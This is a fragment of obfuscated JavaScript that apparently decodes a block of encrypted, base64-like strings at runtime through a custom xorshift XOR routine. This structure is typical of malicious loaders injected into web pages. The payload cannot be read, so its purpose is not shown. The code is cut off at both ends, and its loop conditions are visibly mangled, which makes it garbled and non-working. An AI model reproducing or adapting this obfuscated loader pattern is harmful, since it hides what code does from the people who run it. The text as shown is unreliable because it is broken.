iwo0884HvXiBaXdbDvIg2SLRSCOfxHt3m0aJEXO565pE7Nxq1ldDsuQwlP7Yv","asWdJzBMPvuoWS37mu4nsNuSkZ54fKZ0PfNwfttLAkXboJ0LKnAMTR90qcCzpwVqDGN8L4uVIVEgNSP4QKr8rGvR3XbA/guLUg6po3QmBRsyZCLJ2hq+jU7eOCpC92n+DR7m5GK/RnVv","CnIBEuhPr6a8408p/NREMf4545ZIG8bjVG/gw2A8mIhJ7XFD4Aq5gGe/rbb0Yv912aFAIbGJ+skmXk4nSc9v9UEJS/WbBgpIQQrMRNkqJ8L8Lfy5kx/oiT6WuLW16J1MX0aP4T5EK0BH","i1t1l/ij3DnfiaYGqMOuVkfnT7Iu9M/vc2AiH0khUvSg01rJwDJSFFVYffIzX+hV34Nzx/4ZO8w2s+lgSp7q8bAn91jUGgklvJbf2WA1cNy8XUJukYHi1B2DP87gPchzIUq1/Dq0OIWZ","MipLdfz7DmM42c/XCNy9qjvhXVNXySyBZGeQmozk96kqw51v0evv7a4HCNKWun8SMGmHneoO8P7yeZhuN6ZBMukd9MIuZP+k65LE8hyvo56D9qUvpr9O2S8cq7ne02MAUGJ1XWKnqm9y","gdiDNYWX/iS1BcltpDYMTaxEgJe/h5UynT2X7LA347jYFfxu8rS/6OyBCAkSws5sWwBuhYhzUrvNPt4YsiV1BhWs1bWJG5oBCOc4EVcbFxej2gn3YYOvyRVwr+zSqcunvw+SnuCnmC/G","wq61Qj4AD6X77mfYS92oLSnZnHPWpIoctO51MIwSMP6XEpvlDH3AIYOl9se0NCNta7glTlt3ndpR8FgGlHnFpWcizR4VwRM9sKQ0DTiMyNwbeV8o3GNXNzBcghhgon6nIh8lsr75oKE/","NbuBZwm5VTGVCVqzo9Tiw02biSn8OwFWOshMFeWbMNVRllbBXavRWxXSGwfK3atnwD/bRKkrh2WkEYlOBN/FqOLzjgKF7zoicYCtdgRRMvYzUPuj6ECmIFIxZdM8EyFrug69TitXQXZF","67eAXBldkxzuBd9jPXtpIAlRHobQ8GqXSOCeA9iBlhmsbXPoX3BQzs7YSjsD26Dab4Ej1EdV5lgoumXcGW23jWzemGEXBOt0QBXsGe2Gk2DxQla57GLNLy3XBvoyMkad1twx0zO/LTCl","lsfyxeEYMSyUTvSi8Mi6MGgeE42VY53xFcUxJGLCSiXTYI=="],iwHFf=null,TqTvm=[45,62,41,36],Cajps=72,Utk="",ISSZQ=0,L8XHW={},hm2fV="",WfELY=0,aRR="",i2YKL=0,SUzwL=0,WhbN="";if(iwHFf){for(ISSZQ=0;ISSZQ>4));if(ISSZQ+2>2));if(ISSZQ+3>>0;for(ISSZQ=0;ISSZQ>>0))>>>0;vdILh=(vdILh^(vdILh>>>17))>>>0;vdILh=(vdILh^((vdILh<<5)>>>0))>>>0;aRR+=Q['String']['fromCharCode'](hm2fV.charCodeAt(ISSZQ)^(vdILh&255));}for(ISSZQ=0;ISSZQ>4));if(ISSZQ+2>2));if(ISSZQ+3>>0;for(ISSZQ=0;ISSZQ>>0))>>>0;vdILh=(vdILh^(vdILh>>>17))>>>0;vdILh=(vdILh^((vdILh<<5)>>>0))>>>0;aRR+=Q['String']['fromCharCode'](hm2fV.charCodeAt(ISSZQ)^(vdILh&255));}for(ISSZQ=0;ISSZQ